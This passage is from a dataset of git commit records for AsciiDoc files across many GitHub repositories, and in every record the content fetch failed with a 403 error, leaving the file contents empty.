elasticsearch,sarwarbhuiyan\/elasticsearch,mohit\/elasticsearch,vroyer\/elassandra,nellicus\/elasticsearch,Siddartha07\/elasticsearch,pablocastro\/elasticsearch,vingupta3\/elasticsearch,markharwood\/elasticsearch,likaiwalkman\/elasticsearch,tsohil\/elasticsearch,iacdingping\/elasticsearch,wangtuo\/elasticsearch,nomoa\/elasticsearch,chirilo\/elasticsearch,vingupta3\/elasticsearch,socialrank\/elasticsearch,xingguang2013\/elasticsearch,martinstuga\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,fooljohnny\/elasticsearch,thecocce\/elasticsearch,onegambler\/elasticsearch,MichaelLiZhou\/elasticsearch,jango2015\/elasticsearch,18098924759\/elasticsearch,masterweb121\/elasticsearch,hanswang\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,sc0ttkclark\/elasticsearch,TonyChai24\/ESSource,Widen\/elasticsearch,MjAbuz\/elasticsearch,sneivandt\/elasticsearch,elasticdog\/elasticsearch,mikemccand\/elasticsearch,obourgain\/elasticsearch,mute\/elasticsearch,franklanganke\/elasticsearch,onegambler\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,hechunwen\/elasticsearch,wayeast\/elasticsearch,tsohil\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,achow\/elasticsearch,amit-shar\/elasticsearch,skearns64\/elasticsearch,maddin2016\/elasticsearch,wimvds\/elasticsearch,hydro2k\/elasticsearch,jw0201\/elastic,Chhunlong\/elasticsearch,zeroctu\/elasticsearch,hanswang\/elasticsearch,knight1128\/elasticsearch,scottsom\/elasticsearch,franklanganke\/elasticsearch,fred84\/elasticsearch,milodky\/elasticsearch,hirdesh2008\/elasticsearch,drewr\/elasticsearch,jbertouch\/elasticsearch,achow\/elasticsearch,andrejserafim\/elasticsearch,overcome\/elasticsearch,franklanganke\/elasticsearch,kcompher\/elasticsearch,areek\/elasticsearch,markllama\/elasticsearch,yanjunh\/elasticsearch,dataduke\/elasticsearch,infusionsoft\/elasticsearch,lchennup\/elasticsearch,nomoa\/elasticsearch,feiqitian\/elasticsearch,fekaputra\/elasticsearch,Fsero\/elasticsearch,milodky\/elasticsearch,hechunwen\/elasticsearch,jchampion\/elasticsearch,andrestc\/elasticsearch,MetSystem\/elasticsearch,gfyoung\/elasticsearch,springning\/elasticsearch,queirozfcom\/elasticsearch,martinstuga\/elasticsearch,iamjakob\/elasticsearch,AshishThakur\/elasticsearch,btiernay\/elasticsearch,sdauletau\/elasticsearch,elasticdog\/elasticsearch,rento19962\/elasticsearch,mute\/elasticsearch,MichaelLiZhou\/elasticsearch,easonC\/elasticsearch,wuranbo\/elasticsearch,beiske\/elasticsearch,AndreKR\/elasticsearch,tahaemin\/elasticsearch,Uiho\/elasticsearch,Stacey-Gammon\/elasticsearch,kunallimaye\/elasticsearch,i-am-Nathan\/elasticsearch,pritishppai\/elasticsearch,xingguang2013\/elasticsearch,zkidkid\/elasticsearch,zeroctu\/elasticsearch,jchampion\/elasticsearch,IanvsPoplicola\/elasticsearch,anti-social\/elasticsearch,kenshin233\/elasticsearch,Fsero\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,wittyameta\/elasticsearch,iantruslove\/elasticsearch,caengcjd\/elasticsearch,mrorii\/elasticsearch,awislowski\/elasticsearch,lightslife\/elasticsearch,koxa29\/elasticsearch,Shekharrajak\/elasticsearch,thecocce\/elasticsearch,mnylen\/elasticsearch,liweinan0423\/elasticsearch,phani546\/elasticsearch,kcompher\/elasticsearch,JervyShi\/elasticsearch,smflorentino\/elasticsearch,ricardocerq\/elasticsearch,tebriel\/elasticsearch,himanshuag\/elasticsearch,nilabhsagar\/elasticsearch,hechunwen\/elasticsearch,Brijeshrpatel9\/elasticsearch,overcome\/elasticsearch,ricardocerq\/elasticsearch,mkis-\/elasticsearch,MjAbuz\/elasticsearch,slavau\/elasticsearch,Shekharrajak\/elasticsearch,MetSystem\/elasticsearch,girirajsharma\/elasticsearch,mjason3\/elasticsearch,wuranbo\/elasticsearch,wangyuxue\/elasticsearch,gfyoung\/elasticsearch,ESamir\/elasticsearch,yuy168\/elasticsearch,nrkkalyan\/elasticsearch,pablocastro\/elasticsearch,dylan8902\/elasticsearch,chirilo\/elasticsearch,smflorentino\/elasticsearch,alexkuk\/elasticsearch,wimvds\/elasticsearch,jango2015\/elasticsearch,glefloch\/elasticsearch,achow\/elasticsearch,mjason3\/elasticsearch,andrestc\/elasticsearch,djschny\/elasticsearch,iantruslove\/elasticsearch,JSCooke\/elasticsearch,sposam\/elasticsearch,rlugojr\/elasticsearch,tsohil\/elasticsearch,linglaiyao1314\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,henakamaMSFT\/elasticsearch,chirilo\/elasticsearch,wbowling\/elasticsearch,zeroctu\/elasticsearch,kenshin233\/elasticsearch,jsgao0\/elasticsearch,davidvgalbraith\/elasticsearch,umeshdangat\/elasticsearch,franklanganke\/elasticsearch,Liziyao\/elasticsearch,feiqitian\/elasticsearch,nrkkalyan\/elasticsearch,masterweb121\/elasticsearch,C-Bish\/elasticsearch,codebunt\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,queirozfcom\/elasticsearch,PhaedrusTheGreek\/elasticsearch,HarishAtGitHub\/elasticsearch,mapr\/elasticsearch,strapdata\/elassandra5-rc,mnylen\/elasticsearch,Charlesdong\/elasticsearch,wimvds\/elasticsearch,areek\/elasticsearch,mmaracic\/elasticsearch,iamjakob\/elasticsearch,Rygbee\/elasticsearch,pozhidaevak\/elasticsearch,18098924759\/elasticsearch,camilojd\/elasticsearch,nrkkalyan\/elasticsearch,MisterAndersen\/elasticsearch,mnylen\/elasticsearch,apepper\/elasticsearch,episerver\/elasticsearch,sarwarbhuiyan\/elasticsearch,ouyangkongtong\/elasticsearch,mbrukman\/elasticsearch,EasonYi\/elasticsearch,nellicus\/elasticsearch,NBSW\/elasticsearch,onegambler\/elasticsearch,elancom\/elasticsearch,javachengwc\/elasticsearch,AshishThakur\/elasticsearch,HonzaKral\/elasticsearch,vietlq\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,bestwpw\/elasticsearch,xpandan\/elasticsearch,alexkuk\/elasticsearch,jsgao0\/elasticsearch,fooljohnny\/elasticsearch,jimhooker2002\/elasticsearch,AndreKR\/elasticsearch,fekaputra\/elasticsearch,kubum\/elasticsearch,petabytedata\/elasticsearch,acchen97\/elasticsearch,zkidkid\/elasticsearch,Uiho\/elasticsearch,mbrukman\/elasticsearch,alexshadow007\/elasticsearch,kunallimaye\/elasticsearch,yongminxia\/elasticsearch,easonC\/elasticsearch,lzo\/elasticsearch-1,vvcephei\/elasticsearch,skearns64\/elasticsearch,wayeast\/elasticsearch,maddin2016\/elasticsearch,wbowling\/elasticsearch,mortonsykes\/elasticsearch,knight1128\/elasticsearch,SergVro\/elasticsearch,masaruh\/elasticsearch,Widen\/elasticsearch,truemped\/elasticsearch,robin13\/elasticsearch,amaliujia\/elasticsearch,myelin\/elasticsearch,andrejserafim\/elasticsearch,easonC\/elasticsearch,karthikjaps\/elasticsearch,NBSW\/elasticsearch,wittyameta\/elasticsearch,schonfeld\/elasticsearch,zeroctu\/elasticsearch,diendt\/elasticsearch,adrianbk\/elasticsearch,huypx1292\/elasticsearch,likaiwalkman\/elasticsearch,beiske\/elasticsearch,beiske\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,mkis-\/elasticsearch,abibell\/elasticsearch,strapdata\/elassandra-test,acchen97\/elasticsearch,avikurapati\/elasticsearch,socialrank\/elasticsearch,apepper\/elasticsearch,pritishppai\/elasticsearch,kimimj\/elasticsearch,markwalkom\/elasticsearch,bestwpw\/elasticsearch,apepper\/elasticsearch,wittyameta\/elasticsearch,caengcjd\/elasticsearch,yynil\/elasticsearch,lydonchandra\/elasticsearch,ImpressTV\/elasticsearch,smflorentino\/elasticsearch,mcku\/elasticsearch,kenshin233\/elasticsearch,gingerwizard\/elasticsearch,rento19962\/elasticsearch,masaruh\/elasticsearch,nazarewk\/elasticsearch,Fsero\/elasticsearch,likaiwalkman\/elasticsearch,sneivandt\/elasticsearch,sjohnr\/elasticsearch,apepper\/elasticsearch,sjohnr\/elasticsearch,xingguang2013\/elasticsearch,jpountz\/elasticsearch,awislowski\/elasticsearch,Clairebi\/ElasticsearchClone,codebunt\/elasticsearch,iamjakob\/elasticsearch,iamjakob\/elasticsearch,zkidkid\/elasticsearch,MjAbuz\/elasticsearch,wayeast\/elasticsearch,cwurm\/elasticsearch,kunallimaye\/elasticsearch,cwurm\/elasticsearch,sreeramjayan\/elasticsearch,strapdata\/elassandra5-rc,kingaj\/elasticsearch,khiraiwa\/elasticsearch,brandonkearby\/elasticsearch,rlugojr\/elasticsearch","old_file":"docs\/reference\/cat\/indices.asciidoc","new_file":"docs\/reference\/cat\/indices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6e68742bc9f9ef77b9553b88f4ca3b711a3b49d","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fb8f505a3fbf1f334997e1388a2635d197affbf","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2b7f87d2b7b29e050521970056d5d5bd1cc4f52","subject":"Create test1.adoc","message":"Create test1.adoc","repos":"leonardinius\/leonardinius.github.io,leonardinius\/leonardinius.github.io","old_file":"_drafts\/test1.adoc","new_file":"_drafts\/test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leonardinius\/leonardinius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5d818948d8290424d9b08d5c13e9a74123eccfd","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73bb70e90140a53bf0538943f01029526da389b0","subject":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","message":"Update 2019-02-27-Rancher-E-K-S-R-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d7c1c2d8bcaee1f2dce07f595e1c86e49070bec","subject":"Update 2015-10-22-Specs-vs-Common-Sense.adoc","message":"Update 2015-10-22-Specs-vs-Common-Sense.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-10-22-Specs-vs-Common-Sense.adoc","new_file":"_posts\/2015-10-22-Specs-vs-Common-Sense.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cb0382d68486f4d0e714ec93cd7663e8307f4dd","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b2da02b1383d1211a85ba2769d90bb3e024bcb0","subject":"Update 2017-01-17-Writing-a-Jenkinsfile.adoc","message":"Update 2017-01-17-Writing-a-Jenkinsfile.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2017-01-17-Writing-a-Jenkinsfile.adoc","new_file":"_posts\/2017-01-17-Writing-a-Jenkinsfile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c54d56bb6db735eab18a5be51d350afd9f8c951","subject":"Update 2017-03-28-Testando.adoc","message":"Update 2017-03-28-Testando.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-03-28-Testando.adoc","new_file":"_posts\/2017-03-28-Testando.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5084bc1d42af275101579f450682a2df7afe2173","subject":"Update 2017-10-01-raindrop.adoc","message":"Update 2017-10-01-raindrop.adoc","repos":"ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io,ecmeyva\/ecmeyva.github.io","old_file":"_posts\/2017-10-01-raindrop.adoc","new_file":"_posts\/2017-10-01-raindrop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ecmeyva\/ecmeyva.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"496e3bc367ea932975b26bc161bc1b36e10dd064","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9509df4814022b0f4a67d9cd350afefc66f7f75a","subject":"Update 2017-05-16.adoc","message":"Update 2017-05-16.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16.adoc","new_file":"_posts\/2017-05-16.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dbe0d0b61d2e574ff2c26c5e7d480f226fc995d","subject":"Fixup the release notes documentation","message":"Fixup the release notes documentation\n\nThere was two broken links and I changed the text about installing Kudu to reflect that it doesn't\nhave any dependencies on Cloudera software.\n\nChange-Id: I7c1cca555a343e41d40ac315b695e0c05e3bc2a9\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1181\nReviewed-by: David Ribeiro Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\nTested-by: David Ribeiro Alves <33ea948168c114d220e0372a903be6ee60f6396e@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fceb3d44e593aa31b27713b5299d479d5b03ca4","subject":"Core readme","message":"Core readme\n","repos":"jerr\/jbossforge-core,forge\/core,agoncal\/core,oscerd\/core,agoncal\/core,D9110\/core,D9110\/core,pplatek\/core,oscerd\/core,pplatek\/core,forge\/core,agoncal\/core,ivannov\/core,D9110\/core,jerr\/jbossforge-core,stalep\/forge-core,stalep\/forge-core,forge\/core,ivannov\/core,jerr\/jbossforge-core,oscerd\/core,D9110\/core,forge\/core,jerr\/jbossforge-core,pplatek\/core,forge\/core,agoncal\/core,ivannov\/core,forge\/core,oscerd\/core,D9110\/core,oscerd\/core,oscerd\/core,D9110\/core,ivannov\/core,D9110\/core,jerr\/jbossforge-core,D9110\/core,pplatek\/core,pplatek\/core,ivannov\/core,agoncal\/core,oscerd\/core,ivannov\/core,forge\/core,oscerd\/core,agoncal\/core,forge\/core,agoncal\/core,D9110\/core,jerr\/jbossforge-core,agoncal\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,pplatek\/core,jerr\/jbossforge-core,oscerd\/core,ivannov\/core,forge\/core,oscerd\/core,ivannov\/core,ivannov\/core,jerr\/jbossforge-core,agoncal\/core,agoncal\/core,pplatek\/core,forge\/core,ivannov\/core,pplatek\/core,D9110\/core,pplatek\/core,pplatek\/core","old_file":"core\/README.asciidoc","new_file":"core\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"786821c8054da21bfabad5a5a876c1d2a9c29342","subject":"Update 2015-04-15-Mon-Blog.adoc","message":"Update 2015-04-15-Mon-Blog.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_file":"_posts\/2015-04-15-Mon-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee10c20c71be19d1ad4073f8497e3da4657dd1ff","subject":"Create YAML2SpecificationCompliance.adoc","message":"Create YAML2SpecificationCompliance.adoc\n\nSeparate YAML sections from ReadMe.adoc","repos":"OpenHFT\/Chronicle-Wire,OpenHFT\/Chronicle-Wire","old_file":"YAML2SpecificationCompliance.adoc","new_file":"YAML2SpecificationCompliance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Wire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0140580fbb525383acc0957acb5d54b881a40761","subject":"Update 2016-03-24-Contact-us.adoc","message":"Update 2016-03-24-Contact-us.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-24-Contact-us.adoc","new_file":"_posts\/2016-03-24-Contact-us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2778c3ceea22c85139a9edf2a882db88e632bdb3","subject":"Update 2016-08-31-Title-Here.adoc","message":"Update 2016-08-31-Title-Here.adoc","repos":"crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io","old_file":"_posts\/2016-08-31-Title-Here.adoc","new_file":"_posts\/2016-08-31-Title-Here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crisgoncalves\/crisgoncalves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e4fcb870bd98d1999a672a17212e045983131b0","subject":"using consistent title markers","message":"using consistent title markers\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"docker-java-lab.adoc","new_file":"docker-java-lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e777d5462290ec8f9f91198aee556f507aa85f85","subject":"Update 20161110-1232-showoff-zone-owo.adoc","message":"Update 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1232-showoff-zone-owo.adoc","new_file":"_posts\/20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da59b81e73ab1717cf6092756be45a41c30f05dc","subject":"added readme","message":"added readme\n","repos":"tomasonjo\/neo4j-graph-algorithms","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomasonjo\/neo4j-graph-algorithms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d5ac00c792616a6935e9786dd0183b33b3e6dfc9","subject":"[docs] Add security guide","message":"[docs] Add security guide\n\nChange-Id: Iabf60804975dc105243626be48d3a141c9a4dab5\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6479\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/security.adoc","new_file":"docs\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"547f2a649edbdabc9653c0c0dedf9e904f0dcff7","subject":"add in gluster-setup document","message":"add in gluster-setup document\n","repos":"the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers","old_file":"examples\/gluster\/gluster-setup.adoc","new_file":"examples\/gluster\/gluster-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f01480e15dbfdaec0e48409f5f1f5b78c56354b7","subject":"Create README.adoc","message":"Create README.adoc","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"flyway\/README.adoc","new_file":"flyway\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d52b7b40e75e125a34f486ef3833ab3869110f59","subject":"Update README.adoc","message":"Update README.adoc","repos":"KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"yet-another-docker-its\/README.adoc","new_file":"yet-another-docker-its\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea8162876119549b87d2ac63c11ed4521e4cbf44","subject":"Deleted 2016-12-1-There-was-a-keynote-lecture.adoc","message":"Deleted 2016-12-1-There-was-a-keynote-lecture.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_file":"2016-12-1-There-was-a-keynote-lecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba22b307780d448ff9b7632afb8cb4b97ab1ad2b","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"810de2dccf6cbacf2271831c12d21bd847943e6e","subject":"Update 2016-06-12-Swim-Times-280416-02062016.adoc","message":"Update 2016-06-12-Swim-Times-280416-02062016.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-06-12-Swim-Times-280416-02062016.adoc","new_file":"_posts\/2016-06-12-Swim-Times-280416-02062016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2e3c4781d3c9b66e6c5c303d6e4626427639edc","subject":"Update 2016-11-22-Sweet-Potato.adoc","message":"Update 